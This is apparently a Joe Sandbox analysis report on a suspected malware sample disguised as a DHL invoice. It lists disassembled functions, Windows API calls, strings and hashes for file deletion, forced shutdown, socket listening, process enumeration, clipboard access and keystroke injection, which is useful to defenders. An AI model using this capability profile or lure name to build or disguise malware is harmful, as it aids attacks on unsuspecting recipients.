Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 0626c671417e5131da77b77ea31b3ded1fca9bf2bd4c753f7f6bffaff74037fd
Instruction ID: 69186ca769907779a24085773be890c9aef599e6d822df3c5e2921add64e214a
Opcode Fuzzy Hash: 0626c671417e5131da77b77ea31b3ded1fca9bf2bd4c753f7f6bffaff74037fd
Instruction Fuzzy Hash: 7C31E5F251120A6EDF249FB9EC8CAEE3BEC9F09364F104159EB04E2194DB30DA90CB50

Function 012B979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 012B97BE
FindNextFileW.KERNEL32(00000000,?), ref: 012B9819
FindClose.KERNEL32(00000000), ref: 012B9824
FindFirstFileW.KERNEL32(*.*,?), ref: 012B9840
SetCurrentDirectoryW.KERNEL32(?), ref: 012B9890
SetCurrentDirectoryW.KERNEL32(01306B7C), ref: 012B98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 012B98B8
FindClose.KERNEL32(00000000), ref: 012B98C5
FindClose.KERNEL32(00000000), ref: 012B98D5

Part of subcall function 012ADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 012ADB00

Strings

*.*, xrefs: 012B983B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 90bf3dffff53dc90d1f579039c1ef15f243f2fa31989dd76178ff4b0d5f31564
Instruction ID: a85d09bc590c22bcf26ff73da0e7b59c62d814836f4ac223e40c932e7ece3976
Opcode Fuzzy Hash: 90bf3dffff53dc90d1f579039c1ef15f243f2fa31989dd76178ff4b0d5f31564
Instruction Fuzzy Hash: FA310AB151121AAEEF20DFB9EC88ADE7BBC9F05368F104159E714A21D4DB31DAD4CB60

Function 012AD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01243AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,01243A97,?,?,01242E7F,?,?,?,00000000), ref: 01243AC2

Part of subcall function 012AE199: GetFileAttributesW.KERNEL32(?,012ACF95), ref: 012AE19A

FindFirstFileW.KERNEL32(?,?), ref: 012AD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 012AD1DD
MoveFileW.KERNEL32 ref: 012AD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 012AD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 012AD237

Part of subcall function 012AD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 012AD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 012AD253
FindClose.KERNEL32(00000000), ref: 012AD264

Strings

\*.*, xrefs: 012AD0CD, 012AD0D6, 012AD0EB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 258df91be1a12548ce8062f1748c5676627a21418aae96061437c59d459713b4
Instruction ID: 4a8d5503e802d6756a978730ef000229af4265ae4643cad9519db2e63872afc8
Opcode Fuzzy Hash: 258df91be1a12548ce8062f1748c5676627a21418aae96061437c59d459713b4
Instruction Fuzzy Hash: 4F619B31C1114EABDF19EBE4DA919FEBBB5AF24304F604169E50273191EB30AF49CB60

Function 012BED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 012BED91
EmptyClipboard.USER32 ref: 012BED97
GlobalAlloc.KERNEL32(00000002,?), ref: 012BEDAC
CloseClipboard.USER32 ref: 012BEEA3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: b9f2c448893e73ef084b5fdb63e132462dc3740f43fc733175ee2d1f5d0da485
Instruction ID: 2ec06fb2cc440b15891e47a75322f4ea8a2a9d8eeb3dffa572576d539f286d1c
Opcode Fuzzy Hash: b9f2c448893e73ef084b5fdb63e132462dc3740f43fc733175ee2d1f5d0da485
Instruction Fuzzy Hash: 0441DE30615212AFE320CF19E488BA9BBE8EF44368F05C09DE5298B662C775FC41CBC0

Function 012AE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 012A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 012A170D
Part of subcall function 012A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 012A173A
Part of subcall function 012A16C3: GetLastError.KERNEL32 ref: 012A174A

ExitWindowsEx.USER32(?,00000000), ref: 012AE932

Strings

@, xrefs: 012AE925
, xrefs: 012AE920
, xrefs: 012AE95C
SeShutdownPrivilege, xrefs: 012AE902

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: d4101f72b014eb250316f7f7d2efb6fcf58cf9f734a4939f697325e90cf59e5d
Instruction ID: 55c543b6c8ec925c369980b3f2986cce28bbb23c2ef2e07569717bff32d1d919
Opcode Fuzzy Hash: d4101f72b014eb250316f7f7d2efb6fcf58cf9f734a4939f697325e90cf59e5d
Instruction Fuzzy Hash: 2801D672A30313ABEB6426B8AC8ABFB725C9B14751F864525FE02E21C1E5A05C5582A4

Function 012C1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 012C1276
WSAGetLastError.WSOCK32 ref: 012C1283
bind.WSOCK32(00000000,?,00000010), ref: 012C12BA
WSAGetLastError.WSOCK32 ref: 012C12C5
closesocket.WSOCK32(00000000), ref: 012C12F4
listen.WSOCK32(00000000,00000005), ref: 012C1303
WSAGetLastError.WSOCK32 ref: 012C130D
closesocket.WSOCK32(00000000), ref: 012C133C

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 8dbff9cecda8d4fbe8fa7a8443268217694118ffec7a3fe8437f38bcc69e1d0a
Instruction ID: 5ef087657682491f206735772b08a647972dcd261896c4bf54efecc74fc6bec5
Opcode Fuzzy Hash: 8dbff9cecda8d4fbe8fa7a8443268217694118ffec7a3fe8437f38bcc69e1d0a
Instruction Fuzzy Hash: 1441C375A10111DFD724DF28D089B29BBE6AF46728F18818CDA568F297C771EC81CBE1

Function 0125997D Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 01259BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 01259BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 01259A4E
GetSysColor.USER32 ref: 01259B23
SetBkColor.GDI32(?,00000000), ref: 01259B36

Strings

6ofs, xrefs: 0129778D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$LongProcWindow
String ID: 6ofs
API String ID: 3131106179-1294211291
Opcode ID: 717b630e8a9accc263fbc9c84a972d8eaad1267aa4c21d1d9bafcba5a5a73c49
Instruction ID: e722d4e635dfd849ab77ad90166d3080ada69d30c5dd32f2a1431a63a1b3fb68
Opcode Fuzzy Hash: 717b630e8a9accc263fbc9c84a972d8eaad1267aa4c21d1d9bafcba5a5a73c49
Instruction Fuzzy Hash: 30A1E6B0234146EEFF699A3C8CC9EBF3A5DEB42348F044109FB12D6685CA759981C772

Function 0127B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0127B9D4
_free.LIBCMT ref: 0127B9F8
_free.LIBCMT ref: 0127BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,012E3700), ref: 0127BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0131121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0127BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,01311270,000000FF,?,0000003F,00000000,?), ref: 0127BC36
_free.LIBCMT ref: 0127BD4B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 2444ddd9440cca33af9b0468059f10275125f414ab783da3e903e12f17c616c1
Instruction ID: 6d654b784569879bd07027145f627f66d83bed181ca4e3873c38c3932b9c3bb5
Opcode Fuzzy Hash: 2444ddd9440cca33af9b0468059f10275125f414ab783da3e903e12f17c616c1
Instruction Fuzzy Hash: 1AC1067192420AAFDB25EF7DD840BFBBBB8EF41310F14419ADA94D7245EB309A42CB50

Function 012AD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01243AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,01243A97,?,?,01242E7F,?,?,?,00000000), ref: 01243AC2

Part of subcall function 012AE199: GetFileAttributesW.KERNEL32(?,012ACF95), ref: 012AE19A

FindFirstFileW.KERNEL32(?,?), ref: 012AD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 012AD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 012AD481
FindClose.KERNEL32(00000000), ref: 012AD498
FindClose.KERNEL32(00000000), ref: 012AD4A1

Strings

\*.*, xrefs: 012AD3F2

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 694b671aaa2dd20464782dfec76c79f6ee590c96e01074f984e23896b1641364
Instruction ID: 743b371762665439899eefb618792ac263692374c6102d6f7d9af66fded9c785
Opcode Fuzzy Hash: 694b671aaa2dd20464782dfec76c79f6ee590c96e01074f984e23896b1641364
Instruction Fuzzy Hash: B231B4710293469FC315EF68D8548FF7BE8FEA5214F804A1DF4D553190EB20EA09C762

Function 0127E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0127E645

Strings

1#INF, xrefs: 0127F852
1#IND, xrefs: 0127F83D
1#SNAN, xrefs: 0127F844
1#QNAN, xrefs: 0127F84B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 396689bfff311814b43fa48510ff9da0aa2b7198f0b4b48e6248f4ed9b016383
Instruction ID: b5c00f5f2a99c45838853803ae476e717b6425367af4d7a04df9123c0e5a9344
Opcode Fuzzy Hash: 396689bfff311814b43fa48510ff9da0aa2b7198f0b4b48e6248f4ed9b016383
Instruction Fuzzy Hash: 16C26C72E282298FDB25CF28DD407EAB7B9EB44304F1541EAD55DE7240E774AE818F50

Function 012B648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 012B64DC
CoInitialize.OLE32(00000000), ref: 012B6639
CoCreateInstance.OLE32(012DFCF8,00000000,00000001,012DFB68,?), ref: 012B6650
CoUninitialize.OLE32 ref: 012B68D4

Strings

.lnk, xrefs: 012B64BA, 012B6524, 012B65E0

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: c0b6d7c4c2c1e614502988285ecbdd23a61c4d9d894920e28fb418b42f9b2e4c
Instruction ID: 7b69960b968bed8f3d48d9e89dc786c511dcfc610382307dae9f52cdef818556
Opcode Fuzzy Hash: c0b6d7c4c2c1e614502988285ecbdd23a61c4d9d894920e28fb418b42f9b2e4c
Instruction Fuzzy Hash: C9D17C715283029FD314EF24C880DABB7E8FF98744F40495DF5958B2A1EB71E949CB92

Function 012B9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 012B9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 012B9C8B

Part of subcall function 012B3874: GetInputState.USER32 ref: 012B38CB
Part of subcall function 012B3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 012B3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 012B9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 012B9C75

Strings

*.*, xrefs: 012B9B5D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: bb7281ca34b6f61f9fcad5379b0f1b8cd959561670569d95c56cb1cc4361eeba
Instruction ID: 80c6a39aeab8490bd801362e5a6f3b1ed75624c132116a57850d0c73eca4c672
Opcode Fuzzy Hash: bb7281ca34b6f61f9fcad5379b0f1b8cd959561670569d95c56cb1cc4361eeba
Instruction Fuzzy Hash: 974184B195020A9FDF14DFA8C889AEE7BB4FF19354F144159E605A3290EB309A94CF50

Function 012C1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 012C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 012C307A
Part of subcall function 012C304E: _wcslen.LIBCMT ref: 012C309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 012C185D
WSAGetLastError.WSOCK32 ref: 012C1884
bind.WSOCK32(00000000,?,00000010), ref: 012C18DB
WSAGetLastError.WSOCK32 ref: 012C18E6
closesocket.WSOCK32(00000000), ref: 012C1915

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: f1124a3436d73333aac2cdaad47a22af974a47a7a86b2473f56b1182a08ec41e
Instruction ID: 74579154581d830076580c6fbef0b2a5f3a6b9f7e9b15b1027d92a053476daa0
Opcode Fuzzy Hash: f1124a3436d73333aac2cdaad47a22af974a47a7a86b2473f56b1182a08ec41e
Instruction Fuzzy Hash: 4C51D371A10211AFEB14EF24D886F7A7BE5EB45718F04859CEA059F3C2C771AD41CBA1

Function 012BCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 012BCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 012BCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,012BC21E,00000000), ref: 012BCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,012BC21E,00000000), ref: 012BCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,012BC21E,00000000), ref: 012BCFF2

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 221a3df2d2e5864c503f5f884b0ae0d154fe724fff62a33214190611aed74a3a
Instruction ID: d04fd0e852c8b08cf3605f9460b2b42c591899c6e57fa7787034be50fc1e69fb
Opcode Fuzzy Hash: 221a3df2d2e5864c503f5f884b0ae0d154fe724fff62a33214190611aed74a3a
Instruction Fuzzy Hash: FC315271920206EFEB24DFA9D9C49EBBBF8EB14391B10446FF616D2141D730E950CB60

Function 01248060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 0124813C
VUUU, xrefs: 012483FA
VUUU, xrefs: 0124843C
VUUU, xrefs: 01285DF0
VUUU, xrefs: 012483E8

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: e8251119c6a1e83adda78130e2fe5c09a1e1b8a23480ade5295003fb4ec7706d
Instruction ID: 9dbbb8f8cffe6574e431c94a93b981822e34c76b7db37e9f760feaebc521e376
Opcode Fuzzy Hash: e8251119c6a1e83adda78130e2fe5c09a1e1b8a23480ade5295003fb4ec7706d
Instruction Fuzzy Hash: A1A28E71E3121ACBDF29DF98C8417AEB7B1BF44314F1481AAEA15A7285E7709981CF90

Function 012CA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 012CA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 012CA6BA

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

Process32NextW.KERNEL32(00000000,?), ref: 012CA79C
CloseHandle.KERNEL32(00000000), ref: 012CA7AB

Part of subcall function 0125CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,01283303,?), ref: 0125CE8A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: af023ea83d3d4954ec54308e34f17e1353b9eaa75806cc4fc69055695ad9b43c
Instruction ID: bf162ae2130e6116c11a62ce2f279a6c40da8c4f8931ef518ca1bfda3c5544db
Opcode Fuzzy Hash: af023ea83d3d4954ec54308e34f17e1353b9eaa75806cc4fc69055695ad9b43c
Instruction Fuzzy Hash: 9D516D71518302AFD714EF28D885E6BBBE8FF99B54F004A1DF98597291EB30D904CB92

Function 012AAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 012AABF1
SetKeyboardState.USER32(00000080), ref: 012AAC0D
PostMessageW.USER32 ref: 012AAC74
SendInput.USER32(00000001,?,0000001C), ref: 012AACC6

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
